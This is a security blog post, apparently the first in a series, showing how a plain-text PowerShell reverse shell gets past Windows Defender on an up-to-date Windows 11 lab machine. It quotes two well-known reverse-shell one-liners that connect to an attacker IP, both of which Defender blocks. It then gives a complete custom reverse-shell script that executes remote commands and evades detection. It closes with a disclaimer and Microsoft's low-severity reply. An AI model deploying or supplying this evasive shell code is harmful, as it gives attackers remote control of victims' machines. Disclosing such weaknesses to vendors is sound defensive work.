Flying Under the AV Radar — Part 01
After an individual research, I decided to bring some articles on evading Anti-Virus software. This is the first article of the series and in this article I am going to talk about evading Windows Defender and obtaining a reverse shell as an attacker with PowerShell. You will gain an understanding how easy it is to evade Defender without any complex AV evasion techniques.
Lab setup is as follows,
- Victim — Fully updated Windows 11 machine (As of 22.12.2023)
- Attacker — Parrot Security OS
Please note that the initial payload delivery method is not discussed here. It could be any method, such as social engineering or physical intrusion.
First of all, let’s view the current configuration of Defender in the victim Windows machine,
As you can see, real time protection is turned on and automatic sample submission was turned off for this PoC, since I don’t like my PoC codes being automatically submitted to Microsoft.
Windows Defender detects well-known malicious scripts without any hesitation. There may be many methods involved to detect these scripts. Signature-based detection is one of the key players here. Defender maintains a database of known malware signatures. These signatures are unique identifiers or patterns associated with specific malicious PowerShell scripts. When Windows Defender scans a file, it compares its signature to those in its database. If there’s a match, it flags the file as potentially malicious.
Let’s verify this process by taking PayloadsAllTheThings’ PowerShell reverse shell as an example,
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
It was blocked immediately by Defender.
I tried many well-known reverse shells, such as https://www.revshells.com PowerShell Reverse Shells and they were all blocked immediately.
$LHOST = "10.0.0.1"; $LPORT = 4444; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
It got me thinking, If we set aside all other antivirus detection mechanisms, what role does signature-based detection play in identifying these scripts?
One approach to bypass signature-based detection is to use a payload that doesn’t match any known signatures.
What if I were to develop my own reverse shell?
Below is a PowerShell reverse shell script I coded,
$port = 4444
$ip = '192.168.xx.xx'
$socket = New-Object System.Net.Sockets.TcpClient($ip, $port)
$stream = $socket.GetStream()
$reader = New-Object System.IO.StreamReader $stream
$writer = New-Object System.IO.StreamWriter $stream
[byte[]]$buffer = 0..65535|%{0}
while($true){
$data = $reader.ReadLine()
if ($data -eq $null) {
break
}
$sendback = (iex $data 2>&1 | Out-String )
$writer.WriteLine($sendback)
$writer.Flush()
}
$socket.Close()Upon establishing a Netcat listener on port 4444 on the attacker’s machine, let’s observe the outcomes when I execute the aforementioned PowerShell script on the victim machine. (The PowerShell script is saved as “heh.ps1").
VOILA! There are no AV detections now. Upon taking a look at the attacker machine, we can see that we are successfully granted with the reverse shell. It’s surprising that antivirus solutions still heavily rely on signature-based detection in 2023.
While this might not be the perfect reverse shell, this serves as a promising proof-of-concept, highlighting the ease with which an attacker can evade Windows Defender and exfiltrate data from a victim.
Even without employing advanced techniques like obfuscation, encryption, or AMSI patching, this proof-of-concept demonstrates the effectiveness of a plain-text reverse shell coded in PowerShell. It underscores the potential vulnerabilities in current antivirus solutions, emphasizing the need for enhanced security measures to counter even relatively straightforward evasion attempts.
This may be the expected behaviour of standard Windows Defender. While sophisticated EDR solutions, such as Defender for Endpoint, may provide enhanced security for organizations which may detect the above explained attack, what about the everyday Windows user, who may not invest in expensive EDR solutions? Many consumers rely on default antivirus solutions, and in my point of view, aforementioned attack scenario questions the effectiveness of these solutions against very simple defence evasion techniques.
Note: This content is for educational purposes only. Please refrain from using this information to cause harm or engage in any malicious activities.
I decided to bring this issue up to Microsoft, not expecting a bounty reward but to check whether this is the expected behaviour of Defender. Their reply was, “We determined your finding is valid but does not meet our bar for immediate servicing as it is a low severity security feature bypass. However, we’ve marked your finding for future review as an opportunity to improve our products.”
If you have any thoughts or comments regarding this, please don’t hesitate to reach out to me me via LinkedIn.
